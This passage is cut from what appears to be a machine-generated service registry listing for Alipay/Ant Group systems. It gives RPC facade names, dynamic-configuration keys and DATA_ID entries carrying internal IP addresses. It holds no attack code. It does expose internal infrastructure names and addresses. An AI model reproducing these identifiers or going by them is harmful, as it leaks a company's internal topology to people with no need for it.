dianAdaptiveLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdacommon.common.service.whitelist.SdaWhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.64.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.velocity.DimensionScriptValidateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctu.analysis.spi.OpenRiskTaskAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.TowerSystemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.route.drm.SchedulerRuleResource.grayRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.pcllApplyProcessThreadPool.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppgw.facade.mng.TokenConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserWorkInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantmng.common.service.facade.api.SystemSelfCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.ALiYunCloudIdeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:arpdataprovider@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.FraudBizTaskInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.UserQueryPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.facade.zconsole.MsgbrokerSubscriptionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_ACCOUNT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alcorporation.common.service.facade.api.AlAffiliateDialectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.paybox.platform.BoxBindEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireAuthVostroService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.broadcast.GroupBroadcastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.BankCardRemoveUniqueryWriteSwitch.phraseStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbdish@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.GroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fast.common.service.facade.FastFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.v2.AutoSignFileFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.lfc.LfcReplyUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.notNotifyErrorCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insdataprod.common.service.facade.rest.DiseaseQueryService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.yeb.YebSingleIncomeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.biz.service.meta.command.RmcDoctorController#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.ray.serving.common.service.facade.ControllerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.113.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdeviceprod.common.service.facade.isv.IsvDeviceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.pet.PetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcpcsprod.common.service.facade.ConsumeBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanP2pConfigDrm.loanDemandValidityStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:overseaexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finallocationmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.AIPProtocolManageDRMResource.doPayFailedCntStatusCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobatch.common.service.task.facade.ExpiringCrowdManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.userpsycore.common.service.facade.api.PrivacyCmdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeReportScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.service.facade.api.BenefitContentGzoneQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorTransmitResource.downEventConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dataflow.facade.change.ChangeInfluenceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.ActionRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.statusbar.common.service.StatusbarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.37.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agreementpay.common.service.payment.api.AgreementPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteCustomerLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.api.RpcConfigApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.pointDeduction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbbuservice.common.service.facade.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodtransquery.facade.api.ProdtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.pcardsales.pcardSettleMultiDataSourceNew.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoprod.common.service.facade.GroupCampQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mrchiswisdom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.facade.evaluate.EvaluationReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.92.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S_bkcloudfunds_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acnotifycore.common.service.facade.PostTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.tinyappdata.api.SearchDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.BlockMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendItemGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.open.api.bizverify.BizVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.mavenConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.TransportDrmConfig.projectCheckAuditNotifyEMail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.143.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ifxtrade.common.service.facade.gui.IsolationTableMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.ReleaseQueryService:1.0:xiaokang1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.UserValidateConfigDrm.yebQueryFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.catalog.CatalogBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:regsensor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.cardcoupon.OfficalAccountRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.common.service.facade.OutCallInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iintegration.common.service.facade.api.RetryTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.164.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.196.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.bizprod.common.service.facade.api.user.VerificationLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exclienttrdcenter.service.facade.api.TradeRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.bundle.BundleGrayMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charge.service.facade.ChargeUploadBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.igtransferprodTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zcache.tbase.riskmngTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.120.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.133.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:iotface.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitydata.common.antfeature.manager.RiskTopologyEventStoreManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.basic.question.facade.BasicQuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.facade.load.api.ParmRemoteLoadV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.callback.DataFetcher:1.0:mrchiscore_onlineLeadsCrowdDataFetcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promocenter.facade.api.galaxy.XMktDeliveryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gfmac.common.service.facade.api.custom.BudetConsumeForMarketingCustomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.capital.facade.CapitalFacadeAssetOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.catalog.BizCatalogPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.order.OrderManageRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antlink.tuling.common.service.api.org.AntOrganizationIdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.ext.payment.service.exchangecore.ack.RemitAdvancePayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.16.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.core.service.repository.quotation.CandlestickRepository:1.0:memoryCachedCandlestickRepository@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.titan.dcc.biz.credit.drm.CreditConfigResource.retrievingTaskCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmerchantprod.common.service.workorder.api.InsWorkorderEvaluationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.CompensationService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.MaterialServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.securitydata.common.service.facade.SecuritydataToGzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkibdeposit.common.service.facade.query.InstHistoryDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openexprod.common.service.facade.PartnerSecurityOpenexprodFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_MOBILE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:psbp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.divide.DivideInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.write.CardUseLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:accagovernance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilepep.common.manage.facade.CardBizRegisterManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.bindingaccount.LifeBindingAccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushTemplateGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.ext.DingDingAppFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmac_ProcessBizBudgetCancelCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:dcepprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.inclusionconf.facade.service.conference.FormFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.loan.LoanRestructuredFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.settlement.api.FundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSpuExtAttributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.MarketInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.sceneGrayOpenList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instradeprod.common.service.InsApplicationAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:quotnearsource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sccore.facade.UserSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.MerchantCampManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.tntinst.api.ITntInstMemberMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.CrmMerchantContactService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.PaccFlowManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.useAddp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antc_process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.forceCompile,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finauth.common.service.facade.message.service.MessageSendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eco.smdd.service.api.tinyapp4b.order.OrderQuery4bService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.openplatform.facade.AppQueryServiceFacade:1.0:gmp-openplatform-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.itemcore.common.service.facade.v2.StandardCategoryConsistentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_APYUNFAN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkbizcheck.service.facade.BizCheckCallFacade:1.0:bkloanapplyBizCheckService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antsecscheduler.common.service.facade.RoarManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.1.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapitool.facade.ugw.UnifygwServiceSecurityManageFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.123.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lendpofprod.common.service.facade.loanapi.user.AccessCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.ServiceAccountServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.integrationBlackListAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cif.customer.CustomerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.oidatacenter.common.service.taiji.facade.TaijiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditamount.service.PcreditAmountOccupyXtsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.signprotocol.KbMerchantSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.integration.msgbroker.MsgbrokerClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctuevent.CtuAsynEventMileSearchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdBuMngService:1.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cloud.apopscompose.common.service.facade.processinstance.ProcessInstanceNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.limit.LimitQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.13.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.mif.common.service.facade.AppAssetViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.25.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:minuteXflushCountLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArInvoiceOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.MedicineAssistantMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@drillcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.zcbprod.common.service.facade.partner.service.PartnerInstInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.SearchConfigService:1.0:searchConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.smileseries.service.SmileUserService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.user.action.UserActionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.v3.service.facade.api.news.NewsDetailV30Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.codfund.common.service.facade.CODLogisticsOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanApplyCmdLoadTest.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rassistcenter.common.service.facade.api.IntvContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudbox.facade.api.request.RequestUniformCallbackFacade:1.0:cloudlego@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.operator.OperatorSearchServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.ServiceSearchProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.PlatformReleaseDrmConfig.categoryJsonStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinsight.service.api.excptsis.BizPlaceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepluban.biz.rest.linke.client.LinkeEnvClient#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zpublishuiweb.zpublishuiweb_ds.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.23.31#@#DEFAULT_INSTANCE_ID#@#SO